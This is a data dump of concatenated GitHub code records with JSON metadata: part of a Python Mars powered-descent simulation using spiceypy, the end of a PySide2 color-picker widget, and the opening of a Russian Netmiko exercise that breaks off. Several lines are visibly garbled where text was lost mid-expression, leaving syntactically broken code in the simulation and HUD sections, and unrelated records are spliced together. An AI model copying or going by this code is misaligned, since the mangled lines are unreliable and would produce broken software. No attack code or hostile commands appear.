dsrvf)\n dsuvf=dsvvf-windf #air-relative motion in frozen frame. Drag vector is antiparallel to this vector\n q=self.rho0*vlength(dsuvf)**2/2\n Dv=-vnormalize(dsuvf)*q*self.CdA\n Fv=F*fhatf\n mdot=-F/self.mle_ve\n agvf= aTwoBody(dsrvf, gm=self.mars_gm) + aJ2(dsrvf, j2=self.mars_j2, gm=self.mars_gm, re=self.mars_re)\n dsavf=(Fv+Dv)/m+agvf\n dsrvfs.append(dsrvf+dsvvf*dt)\n dsvvfs.append(dsvvf+dsavf*dt)\n ets.append(et)\n m=m+mdot*dt\n i+=1\n done=vlength(dsrvf)<(r0-7)\n self.events[\"flyaway1\"] = et # Landing phase is over when kinetic energy of all hardware relative to surface is zero\n self.i_step[\"flyaway1\"]=i-1+self.ets.size\n #sort the event list\n self.events=dict(sorted(self.events.items(),key=lambda x:x[1]))\n self.write_events()\n k=\"flyaway1\"\n v=self.events[k]\n print(f\"Event {k:15}: E{self.format_time(v, self.events['ei'])} L{self.format_time(v, self.events['land'])} ET{v:.3f} ({spiceypy.etcal(v)}) i_step {self.i_step[k]:6d}\")\n print(f\"Done integrating flyaway. 
Steps: {i}\")\n self._extend(dsrvfs,dsvvfs,ets)\n def _extend(self,dsrvfs,dsvvfs,ets):\n dsrvfs=np.array(dsrvfs)[:,:,0].T\n dsvvfs=np.array(dsvvfs)[:,:,0].T\n self.svf=np.hstack((self.svf,np.vstack((dsrvfs,dsvvfs))))\n n_ets_old = self.ets.size\n self.ets=np.hstack((self.ets,np.array(ets)))\n print(\"Extend the et list to anim_et1...\")\n n_ets_new = len(ets)\n self.dts=self.ets*0\n self.dts[1:]=self.ets[1:]-self.ets[:-1]\n self.dts[0]=self.dts[1]\n self.pdts=self.pdts+[et2pdt(et) for et in ets]\n self.i_steps=np.arange(len(self.ets))\n print(\"Extend the vector stacks to cover the new et range...\")\n self.Msrf = np.concatenate((self.Msrf, np.zeros((n_ets_new, 6, 6))), axis=0)\n self.sunr = np.concatenate((self.sunr, np.zeros((3, n_ets_new))), axis=1)\n self.earthr = np.concatenate((self.earthr, np.zeros((3, n_ets_new))), axis=1)\n self.earthlt = np.hstack((self.earthlt, np.zeros(n_ets_new)))\n self.rovsvr = np.concatenate((self.rovsvr, np.zeros((6, n_ets_new))), axis=1)\n for i_new, et in enumerate(ets):\n i = n_ets_old + i_new\n Msri = spiceypy.sxform(\"J2000\", \"IAU_MARS\", et) # Stack of matrices converting to rotating from inertial\n self.Msrf[i, :, :] = Msri @ self.Msfi.transpose()\n state, _ = spiceypy.spkezr(\"SUN\", et, \"IAU_MARS\", \"LT+S\", \"499\")\n self.sunr[:, i] = state[:3] * self.km\n state, lt = spiceypy.spkezr(\"399\", et, \"IAU_MARS\", \"XCN+S\", \"499\")\n self.earthr[:, i] = state[:3] * self.km\n self.earthlt[i] = lt\n self.rovsvr[:,n_ets_old:]=self.rovsvr[:,None,n_ets_old-1]\n\n def _acc(self):\n super()._acc()\n self._thrust()\n def _thrust(self):\n \"\"\"\n Calculate thrust needed to perform powered descent,\n :sets pdv_mass: PDV mass, only valid after backshell separation\n :sets delta_v: accumulated delta-v\n :sets throttle_straight: throttle level for straight engines\n :sets throttle_cant: throttle level for canted engines\n \"\"\"\n print(\"Calculating thrust and throttle...\")\n self.pdv_mass=np.zeros(self.ets.size)\n self.delta_v=np.zeros(self.ets.size)\n self.throttle_straight=np.zeros(self.ets.size)\n self.throttle_cant=np.zeros(self.ets.size)\n et_pdi=self.events[\"pdi\"]\n et_skycrane0=self.events[\"skycrane\"]\n w=np.where(self.etsdrag else 0 #effective vertical thrust\n n_mle=8 if et10000:\n print(\"Hey!\")#kg/s fuel flow from all active engines\n dt=et-self.ets[i-1]\n dv=(Fvert/m)*dt #Only include effect of vertical thrust, not drag\n self.pdv_mass[i]=m-dt*mdot\n self.prop_used[i]=self.prop_used[i-1]+dt*mdot\n self.delta_v[i]=self.delta_v[i-1]+dv\n self.Ftot=smooth(self.Ftot,-50,50)\n self.Fvert=smooth(self.Fvert,-50,50)\n self.throttle_straight=smooth(self.throttle_straight,-50,50)\n self.throttle_cant=smooth(self.throttle_cant,-50,50)\n self.plot_throttle()\n return None\n def tabulate(self):\n super().tabulate()\n self.t_rovsvr=tableterp(self.ets,self.rovsvr)\n self.t_Ftot=tableterp(self.ets,self.Ftot)\n self.t_Fvert=tableterp(self.ets,self.Fvert)\n self.t_throttle_straight=tableterp(self.ets,self.throttle_straight)\n self.t_throttle_cant=tableterp(self.ets,self.throttle_cant)\n self.t_pdv_mass=tableterp(self.ets,self.pdv_mass)\n self.t_delta_v=tableterp(self.ets,self.delta_v)\n self.t_prop_used = tableterp(self.ets, self.prop_used)\n\n def _print_pov(self, et_step, i_step, tiles=None, file=None):\n super()._print_pov(et_step, i_step, tiles=tiles, file=file)\n self.print_vector(\"Rrover\",v=self.t_rovsvr(et_step)[:3],comment=\"Rover position vector\",file=file)\n self.print_vector(\"Vrover\",v=self.t_rovsvr(et_step)[3:],comment=\"Rover velocity 
vector\",file=file)\n self.print_scalar(\"Fvert\",v=self.t_Fvert(et_step),comment=\"Vertical thrust\",file=file)\n self.print_scalar(\"Ftot\",v=self.t_Ftot(et_step),comment=\"Total thrust\",file=file)\n self.print_scalar(\"Fstraight\",v=self.t_throttle_straight(et_step),comment=\"Thrust on each straight engine\",file=file)\n self.print_scalar(\"Fcant\",v=self.t_throttle_cant(et_step),comment=\"Thrust on each canted engine\",file=file)\n self.print_scalar(\"Prop_used\",v=self.t_prop_used(et_step),comment=\"Propellant used\",file=file)\n self.print_scalar(\"PDV_mass\",v=self.t_pdv_mass(et_step),comment=\"Powered Descent Vehicle wet mass\",file=file)\n self.print_scalar(\"DeltaV\", v=self.t_delta_v(et_step), comment=\"Effective Delta-V\", file=file)\n\n def plot_throttle(self):\n plt.figure('mass')\n max=np.max(self.pdv_mass)\n plt.plot(self.ets,self.pdv_mass,'-',label=\"PDV wet mass\")\n plt.plot(self.ets,self.prop_used,'-',label=\"PDV prop used\")\n plt.legend()\n plt.ylabel('mass/kg')\n self.plot_events(0,max)\n plt.legend()\n\n plt.figure('thrust')\n F=self.throttle_cant*4+self.throttle_straight*4\n max=np.max(F)\n plt.plot(self.ets,F,'-',label=\"Total thrust\")\n plt.plot(self.ets,self.throttle_cant,'-',label=\"Canted engine thrust/each\")\n plt.plot(self.ets,self.throttle_straight,'-',label=\"Straight engine thrust/each\")\n plt.legend()\n plt.ylabel('thrust/N')\n self.plot_events(0,max)\n plt.legend()\n\n plt.figure('DeltaV')\n max=np.max(self.delta_v)\n plt.plot(self.ets,self.delta_v,'-',label=\"Accumulated Delta-V\")\n plt.legend()\n plt.ylabel('DeltaV/(m/s)')\n self.plot_events(0,max)\n plt.legend()\n plt.pause(0.001)\n\nclass JPLHUD(HUD):\n def draw_meter(self,pb:PictureBox,*,xc:float,v0:float,v1:float,v:float,name:str,units:str):\n scl=1\n r=70*scl\n xc=xc*scl\n yc=960*scl\n lw=8*scl\n pb.arc(xc,yc,r,90,315,color='w',linewidth=lw,fill=False,alpha=0.5)\n pb.arc(xc,yc,r,90,linterp(v0,90,v1,315,v1 if v>v1 else v0 if v= -1:\n event.acceptProposedAction()\n return\n event.ignore()\n\n def dragMoveEvent(self, event):\n pos = event.pos()\n self._index = self.index_from_event_pos(event.pos())\n self.update()\n event.acceptProposedAction()\n\n def dropEvent(self, event):\n if event.mimeData().hasText():\n index = decode_index(event.mimeData().text())\n if index >= -1:\n self._index = self.index_from_event_pos(event.pos())\n color = qcolor_linear_to_srgb(color_from_index(index))\n self._colors[self._index] = (index, color)\n event.acceptProposedAction()\n self.update()\n return\n event.ignore()\n\n def mouseDoubleClickEvent(self, event):\n # TODO: emit signal\n self._index = self.index_from_event_pos(event.pos())\n print(self._index)\n event.accept()\n\n def update_index(self, index):\n swatch = self._colors[index]\n color = swatch[1]\n rgb = color.rgb() & 0xFFFFFF\n (r, g, b, _) = color.getRgb()\n tip = \"HEX: #{:06X} RGB: ({:03d} {:03d} {:03d})\".format(rgb, r, g, b)\n self.setToolTip(tip)\n self.update()\n\n\nclass TColorPreview(QWidget):\n doubleClicked = Signal()\n\n def __init__(self, parent):\n super(TColorPreview, self).__init__(parent)\n self._color = QColor(Qt.white)\n self._color_srgb = QColor(Qt.white)\n self._dragStartPosition = QPoint()\n\n menu = QMenu(self)\n menu.addAction(\"Copy by index\", lambda: self.clipboard_color(\"index\"))\n menu.addAction(\"Copy as Linear\", lambda: self.clipboard_color(\"linear\"))\n menu.addAction(\"Copy as sRGB\", lambda: self.clipboard_color(\"srgb\"))\n self.menu = menu\n\n def paintEvent(self, event):\n painter = QPainter(self)\n 
painter.fillRect(self.rect(), QBrush(self._color_srgb))\n painter.setCompositionMode(QPainter.RasterOp_SourceXorDestination)\n pen = QPen(QBrush(Qt.white), 2., Qt.SolidLine, Qt.SquareCap, Qt.MiterJoin)\n painter.setPen(pen)\n painter.drawRect(self.rect().adjusted(1, 1, -1, -1))\n\n def mouseDoubleClickEvent(self, event):\n self.doubleClicked.emit()\n event.accept()\n\n def contextMenuEvent(self, event):\n self.menu.popup(event.globalPos())\n\n @property\n def color(self):\n return self._color\n\n @color.setter\n def color(self, value):\n self._color = value\n self._color_srgb = qcolor_linear_to_srgb(value)\n\n rgb = value.rgb() & 0xFFFFFF\n self.setToolTip(\"#{:06X}\".format(rgb))\n r, g, b, _ = value.getRgb()\n h, s, v, _ = value.getHsv()\n # Qt returns a hue value of -1 for achromatic colors\n h = max(0, h)\n tip = \"HEX: #{:06X} RGB: ({:03d} {:03d} {:03d}) HSV: ({:03d} {:03d} {:03d})\".format(rgb, r, g, b, h, s, v)\n self.setStatusTip(tip)\n self.update()\n\n def clipboard_color(self, mode):\n if mode == \"hex\":\n rgb = self._color.rgb() & 0xFFFFFF\n text = \"{:06X}\".format(rgb)\n elif mode == \"index\":\n text = encode_index(self.parentWidget().index)\n else:\n (r, g, b, _) = self._color_srgb.getRgb() if mode == \"srgb\" else self._color.getRgb()\n text = \"{:1f} {:1f} {:1f} 1.0\".format(r / 255., g / 255., b / 255.)\n\n clipboard = QApplication.clipboard()\n clipboard.setText(text)\n\n def mousePressEvent(self, event):\n if event.button() == Qt.LeftButton:\n self._dragStartPosition = event.pos()\n\n def mouseMoveEvent(self, event):\n if event.buttons() != Qt.LeftButton:\n return\n if (event.pos() - self._dragStartPosition).manhattanLength() < QApplication.startDragDistance():\n return\n\n pixmap = QPixmap(23, 23)\n pixmap.fill(self._color_srgb)\n\n drag = QDrag(self)\n mime_data = QMimeData()\n text = encode_index(self.parentWidget().index)\n mime_data.setText(text)\n drag.setMimeData(mime_data)\n drag.setPixmap(pixmap)\n\n drop_action = drag.start(Qt.CopyAction) # | Qt.MoveAction)\n\n\nclass TColorPicker(QWidget):\n doubleClicked = Signal()\n\n def __init__(self, parent=None):\n super(TColorPicker, self).__init__(parent)\n self.setFocusPolicy(Qt.ClickFocus)\n self.setWindowTitle(\"Color Picker\")\n self._index_offset = 256\n\n self._swatch = TSwatch(self)\n self._swatch.move(8, 8)\n geom = self._swatch.geometry()\n\n self._prewiew = TColorPreview(self)\n self._prewiew.setGeometry(8, geom.bottom() + 8, 137, 48)\n self._prewiew.doubleClicked.connect(lambda: self.doubleClicked.emit())\n geom = self._prewiew.geometry()\n\n self._label = QLabel(self)\n self._label.setGeometry(geom.right() + 8, geom.top(), 168, geom.height())\n self._label.setFont(QFont(\"Courier New\"))\n self._label.setText(\"line 1\\nline 2\")\n\n self._box_sv = TColorPickerSV(self)\n self._box_sv.setGeometry(self._box_sv.rect().translated(8, geom.bottom() + 8))\n self._box_sv.changed.connect(self.color_changed)\n self._box_sv.doubleClicked.connect(lambda: self.doubleClicked.emit())\n geom = self._box_sv.geometry()\n\n self._bar_hue = TColorPickerHue(self)\n self._bar_hue.setGeometry(self._bar_hue.rect().translated(geom.right() + 8, geom.top() - 1))\n self._bar_hue.changed.connect(self._box_sv.set_hue)\n\n br = self._bar_hue.geometry().bottomRight()\n self.setFixedSize(br.x() + 8, br.y() + 8)\n\t\t\n self._box_sv.set_hue(0)\n\n def keyPressEvent(self, event):\n if event.modifiers() == Qt.ShiftModifier:\n self._bar_hue.keyPressEvent(event)\n else:\n self._box_sv.keyPressEvent(event)\n\n def wheelEvent(self, event):\n e 
= QKeyEvent(QEvent.None_, Qt.Key_Down if event.delta() < 0 else Qt.Key_Up, Qt.NoModifier)\n self._bar_hue.keyPressEvent(e)\n event.accept()\n\n def color_changed(self, value):\n self._prewiew.color = value\n # update color info\n rgb = value.rgb() & 0xFFFFFF # remove alpha\n (r, g, b, _) = value.getRgb()\n (h, s, v, _) = value.getHsv()\n # Qt returns a hue value of -1 for achromatic colors\n if h == -1: h = 0\n self._label.setText(\"HEX: #{:>06X}\\nRGB: ({:03d} {:03d} {:03d})\\nHSV: ({:03d} {:03d} {:03d})\".format(rgb, r, g, b, h, s, v))\n self.doubleClicked.emit()\n\n @property\n def index(self):\n eh = self._bar_hue._pos\n eh = eh if eh < 90 else 0\n es = self._box_sv._pos.x()\n ev = self._box_sv._pos.y()\n if ev == 0 or es == 0:\n es = eh = 0\n index = self._index_offset + eh * 25 * 25 + ev * 25 + es\n return index\n\n @index.setter\n def index(self, value):\n eh, es, ev = get_hsv_indexes(value)\n self._bar_hue.set_pos(eh)\n self._box_sv.set_pos(QPoint(es, ev))\n\n @property\n def color(self):\n return self._prewiew.color\n\n @color.setter\n def color(self, value):\n h, s, v, _ = value.getHsv()\n # Qt returns a hue value of -1 for achromatic colors\n h = max(0, h)\n eh = int(h / 4.)\n es = int(s / 10.2)\n ev = int(v / 10.2)\n if ev == 0:\n eh = es = 0\n if ev == 255 and es == 0:\n eh = 0\n self._bar_hue.set_pos(eh)\n self._box_sv.set_pos(QPoint(es, ev))\n\n\nclass TMainWindow(QMainWindow):\n def __init__(self, parent=None):\n super(TMainWindow, self).__init__(parent)\n self.setWindowFlags(self.windowFlags() | Qt.MSWindowsFixedSizeDialogHint & ~Qt.WindowMaximizeButtonHint)\n self.setWindowTitle(\"Color Picker\")\n\n self.setStatusBar(QStatusBar(self))\n\n picker = TColorPicker(self)\n self.setCentralWidget(picker)\n\n\ndef main():\n app = QApplication(sys.argv)\n window = TMainWindow()\n # pal = QPalette()\n # pal.setColor(QPalette.Background, QColor(100, 100, 100))\n # window.setAutoFillBackground(True)\n # window.setPalette(pal)\n window.show()\n app.exec_()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "ATGH15102AFMLD/techart-staff", "sub_path": "python/color_picker/color_picker.py", "file_name": "color_picker.py", "file_ext": "py", "file_size_in_byte": 19820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PySide2.QtGui.QColor.fromRgbF", "line_number": 79, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 79, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QColor.fromRgbF", "line_number": 94, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 94, "usage_type": "name"}, {"api_name": "re.search", "line_number": 106, "usage_type": "call"}, {"api_name": "math.fmod", "line_number": 116, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor.fromHsv", "line_number": 127, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 127, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 130, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 131, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 131, "usage_type": "argument"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 132, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 137, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 140, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 140, "usage_type": "attribute"}, 
{"api_name": "PySide2.QtCore.Qt", "line_number": 140, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 141, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 142, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 154, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QImage", "line_number": 166, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QImage.Format_RGB32", "line_number": 166, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPixmap.fromImage", "line_number": 167, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 167, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.KeepAspectRatio", "line_number": 167, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 167, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.FastTransformation", "line_number": 167, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QColor.fromHsv", "line_number": 177, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 177, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 184, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 188, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPainter.RasterOp_SourceXorDestination", "line_number": 191, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 191, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPen", "line_number": 192, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 192, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 192, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 192, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.SolidLine", "line_number": 192, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.SquareCap", "line_number": 192, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.MiterJoin", "line_number": 192, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.QRect", "line_number": 195, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.Key_Left", "line_number": 212, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 212, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Right", "line_number": 212, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Up", "line_number": 212, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Down", "line_number": 212, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Left", "line_number": 214, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 214, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Right", "line_number": 215, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 215, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Up", "line_number": 216, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 216, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Down", "line_number": 217, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 217, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 218, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 222, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 223, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QSize", 
"line_number": 228, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 230, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 231, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 238, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QImage", "line_number": 249, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QImage.Format_RGB32", "line_number": 249, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPixmap.fromImage", "line_number": 250, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 250, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 250, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.IgnoreAspectRatio", "line_number": 250, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 250, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.FastTransformation", "line_number": 250, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 254, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPen", "line_number": 259, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 259, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.black", "line_number": 259, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 259, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.SolidLine", "line_number": 259, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.SquareCap", "line_number": 259, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.MiterJoin", "line_number": 259, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.QRect", "line_number": 261, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.Key_Left", "line_number": 286, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 286, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Right", "line_number": 286, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Up", "line_number": 286, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Down", "line_number": 286, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.Key_Up", "line_number": 288, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 288, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Down", "line_number": 289, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 289, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 296, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 297, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 302, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 303, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 313, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 313, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 313, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.ClickFocus", "line_number": 316, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 316, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 333, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QRect", "line_number": 342, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 343, "usage_type": "call"}, {"api_name": 
"PySide2.QtGui.QPainter.RasterOp_SourceXorDestination", "line_number": 346, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 346, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPen", "line_number": 347, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 347, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 347, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 347, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.SolidLine", "line_number": 347, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.SquareCap", "line_number": 347, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.MiterJoin", "line_number": 347, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.QRect", "line_number": 351, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.NoButton", "line_number": 355, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 355, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.LeftButton", "line_number": 355, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.LeftButton", "line_number": 363, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 363, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 410, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 411, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 415, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 415, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 415, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QColor", "line_number": 416, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 416, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 416, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 417, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMenu", "line_number": 419, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 426, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 427, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPainter.RasterOp_SourceXorDestination", "line_number": 428, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 428, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPen", "line_number": 429, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 429, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.white", "line_number": 429, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 429, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.SolidLine", "line_number": 429, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.SquareCap", "line_number": 429, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.MiterJoin", "line_number": 429, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QApplication.clipboard", "line_number": 469, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 469, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.LeftButton", "line_number": 473, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 473, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.LeftButton", "line_number": 477, "usage_type": "attribute"}, {"api_name": 
"PySide2.QtCore.Qt", "line_number": 477, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication.startDragDistance", "line_number": 479, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 479, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 482, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QDrag", "line_number": 485, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QMimeData", "line_number": 486, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.CopyAction", "line_number": 492, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 492, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 495, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 496, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.ClickFocus", "line_number": 500, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 500, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 513, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 515, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.ShiftModifier", "line_number": 534, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 534, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QKeyEvent", "line_number": 540, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QEvent.None_", "line_number": 540, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.QEvent", "line_number": 540, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Down", "line_number": 540, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 540, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.Key_Up", "line_number": 540, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt.NoModifier", "line_number": 540, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 570, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 589, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMainWindow", "line_number": 592, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.MSWindowsFixedSizeDialogHint", "line_number": 595, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 595, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.WindowMaximizeButtonHint", "line_number": 595, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QStatusBar", "line_number": 598, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 605, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 605, "usage_type": "attribute"}]} +{"seq_id": "6910990946", "text": "# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nЗадание 24.2b\r\n\r\nСкопировать класс MyNetmiko из задания 